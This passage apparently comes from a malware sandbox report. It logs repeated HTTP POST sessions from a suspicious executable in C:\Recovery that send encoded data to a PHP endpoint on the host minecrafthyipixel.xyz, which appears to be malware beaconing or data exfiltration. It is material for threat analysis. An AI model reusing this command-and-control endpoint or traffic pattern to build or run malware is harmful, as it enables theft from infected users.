                                                                                                                                    Data Ascii: WY^XYAT\\^YYWWX^TZ_XT^S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'-6U ;\' +$].>&,$;&Q4*$7<^.$[. X 1
Apr 19, 2024 13:43:39.066993952 CEST | 768 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:39 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3zAUluxiU01M7DJmpwwV7QjoJf8t22WqxYa1DhCui4ONRAfKt%2Bjp7Ybqq0ZynII0cVOrKmgInPXxelNV%2Bu9q7KW3MwI62G2WX7MLcBuwYPuDdppFUrwh9%2F4mEPafHWY2PdQ5dXJuz34%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca35b3f23b0ca-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 27 07 24 26 3d 04 22 39 3c 00 29 30 3d 02 3d 37 07 5d 29 29 31 5d 37 3d 38 55 2f 3a 20 1f 2b 2b 29 05 25 23 29 56 24 13 24 52 25 0a 21 59 00 1a 39 59 23 12 26 04 2d 29 03 59 2b 22 3d 5e 34 21 27 5f 3c 3d 3a 0d 23 38 2f 5b 2b 10 25 15 3b 3b 2c 52 3c 06 39 15 2d 24 35 04 21 01 2c 52 09 12 26 0a 28 06 38 10 25 56 3d 57 34 0f 28 5d 28 3f 31 05 27 28 20 1d 26 20 23 07 2e 22 29 0d 27 3e 07 10 3d 2a 0e 10 20 3c 21 57 26 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98'$&="9<)0==7]))1]7=8U/: ++)%#)V$$R%!Y9Y#&-)Y+"=^4!'_<=:#8/[+%;;,R<9-$5!,R&(8%V=W4(](?1'( & #.")'>=* <!W&.^,+H0TW
Apr 19, 2024 13:43:39.067050934 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 49852 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:38.931951046 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:43:39.038124084 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:39.038435936 CEST | 2512 | OUT | Data Raw: 57 54 5b 5f 59 41 51 5e 5c 5e 59 59 57 56 58 59 54 52 5f 59 54 5d 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[_YAQ^\^YYWVXYTR_YT]SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1X>T"<0V808)>(?_&<%4"5>;/^4?;-5$[. X !
Apr 19, 2024 13:43:39.313425064 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:39 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Kp3zeKl6KOcSQrapkbMk8PBKNevZRrlgw2aqfpnJYmJll%2BVIG1sDHAI1%2BIGUOLHxgt1UfgGVBaj2ysb%2Fa0aR7CLFLFvW197NSWZtg9oRfdaUOyBERewPLmPuBV6eh9ALPrJ8hyS7QE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca35caa376735-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:39.313484907 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 49853 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:39.545855999 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:43:39.650800943 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:39.652947903 CEST | 2512 | OUT | Data Raw: 57 54 5b 5e 5c 44 54 5a 5c 5e 59 59 57 53 58 5c 54 53 5f 57 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[^\DTZ\^YYWSX\TS_WTXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^1X6R +,X&0($8-P?8&:8U1("Q#15*(7^",/%$[. X 5
Apr 19, 2024 13:43:40.021022081 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:39 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=actJndEBZK9xfKjdvqJP%2BbjX6rzsErmCIpnsCTIJnuudhoQlomSIQgctfZUpiiIYfczGv0rFPVxXyAlHCyXA%2Banph9GgSu6f9B%2BmAw0NAwXU%2B1ngqEs36pKe7Yfm3wNmhY3ZAxcnppU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3608bba7be2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:40.021117926 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.4 | 49854 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:40.249349117 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:40.353858948 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:40.355811119 CEST | 2512 | OUT | Data Raw: 52 5e 5e 58 5c 46 54 5f 5c 5e 59 59 57 5f 58 5b 54 52 5f 5b 54 5e 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^X\FT_\^YYW_X[TR_[T^S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>%"+$;0;=;#&9,%+*7!*(7 <$-%$[. X
Apr 19, 2024 13:43:40.708277941 CEST | 629 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:40 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BfS%2B5NIFPLwxcj2tI2xuxOBjlUF%2BoRPztjHy9eelKbUrUdgRwnXKX%2BkUALWgZjoKPTP9EgbqGG%2B04wseXoi0D80N4%2F0d%2BIWZnUhxYDMzUg2XQ1VhNLTQlcgP2f6vbVk%2FbPIRvjnUE30%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca364ee5a452d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:40.708338976 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.4 | 49855 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:40.936512947 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:41.041160107 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:41.041522980 CEST | 2512 | OUT | Data Raw: 57 5d 5e 59 59 4a 54 5b 5c 5e 59 59 57 5f 58 5e 54 52 5f 56 54 58 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^YYJT[\^YYW_X^TR_VTXSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\166 '07^%;%U=Y&#$+&Q!""*#$[/%$[. X
Apr 19, 2024 13:43:41.399600029 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:41 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oy4wSRZn5jo2cEQ2Fx4MqAFRGe6a0SIsNHdZ5r8aj1VqhNSqb0WJaI8CZ8ugwtRbpl9rHCjU0Evecwd1KZ3DYpY5qRaoj%2BSElyrAG4SVJHJhwtJNsF9m71ZA7d7SoWceS%2FJd8y3E%2B08%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3693b84ad94-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:41.399665117 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    106 | 192.168.2.4 | 49856 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:41.624532938 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:41.729137897 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:41.729377985 CEST | 2512 | OUT | Data Raw: 57 5c 5e 5e 59 44 51 59 5c 5e 59 59 57 54 58 5c 54 5a 5f 5e 54 5a 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^^YDQY\^YYWTX\TZ_^TZS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\%*"?3#$';V*(2:8U2 2))]?#:5$[. X )
                                                                                                                                    Apr 19, 2024 13:43:42.021167040 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:41 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8H%2BCDhMk9P5T67curWEG%2BDxwzBibaB9D%2FToOJ%2F076InJZamy00hyijUh%2BL965t7lFiWeJGqGSz1U3sbuK%2FUMqSk85KFDb3DwZMSj46U4wn0qywzY9hw9g1qllVqlp%2FJOZACPMpSJZ6M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca36d7a4a69f7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:42.021229982 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    107 | 192.168.2.4 | 49857 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:42.255676031 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:42.360510111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:42.360666990 CEST | 2504 | OUT | Data Raw: 57 55 5b 59 59 4a 51 5d 5c 5e 59 59 57 57 58 53 54 52 5f 59 54 55 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[YYJQ]\^YYWWXSTR_YTUSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[26T!+([&#+Z$-T=;X'*/&"R T)++4"<<:%$[. X
                                                                                                                                    Apr 19, 2024 13:43:42.727601051 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:42 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EJJr6Wdrr0XC9NulWt8ijy7B%2FE8unOw8pPGLh%2FIku4gEKt2OBEQIqW7nHpvMU5icLZ4AwHIDJb2RumvS0ONDbPaOTcqskygajfiYIEU0k9UQMluVsy7xReudx60YUx9BSJl1OJu%2FZwA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3716e1d44d2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:42.727665901 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    108 | 192.168.2.4 | 49858 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:42.954305887 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:43.059529066 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:43.059720993 CEST | 2512 | OUT | Data Raw: 57 5c 5e 5e 59 47 54 5c 5c 5e 59 59 57 5e 58 5d 54 56 5f 5d 54 5a 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^^YGT\\^YYW^X]TV_]TZSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1*S6; 0\'+)Q*2#%;2Q "&)"<89$[. X
                                                                                                                                    Apr 19, 2024 13:43:43.310870886 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:43 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8HEFs3k6MaG53571%2F2PYDKSJhj2UNNncx3UMxalPBcxKwGQSlfCiueuqaZuo1b%2Bttq%2Bsef0IU9SOdgQ5o60dhfhDfoE7uv1FKvMPZKFuUdTS%2BN9LK8QXAOhZazjz4w5%2BOLTxxNNhDM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca375cc5eadb3-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:43.310934067 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    109 | 192.168.2.4 | 49859 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:43.547169924 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:43.651573896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:43.651904106 CEST | 2512 | OUT | Data Raw: 57 5f 5b 5b 5c 46 51 5a 5c 5e 59 59 57 53 58 5e 54 53 5f 59 54 5e 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[[\FQZ\^YYWSX^TS_YT^SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1&T"(<\& ;\0+5T=+&)$S%;!16T>;/7[/5$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:44.004384041 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:43 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gcxhCz0DoOMx%2F%2FwBM5Jc1YTdPwD22HwbOegw7MtSDC3dYSBpnUGUeHKY4VlaDJa3IuYexjnGfdzlRT8XeQ8GXh1QN7mizb3%2FD3qFWt1m%2FWs5Rv%2BsqvidGM%2BjAVNn%2B9KkKFQWwFrjZXg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3798a2053bb-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:44.004411936 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    110 | 192.168.2.4 | 49861 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:44.240638971 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
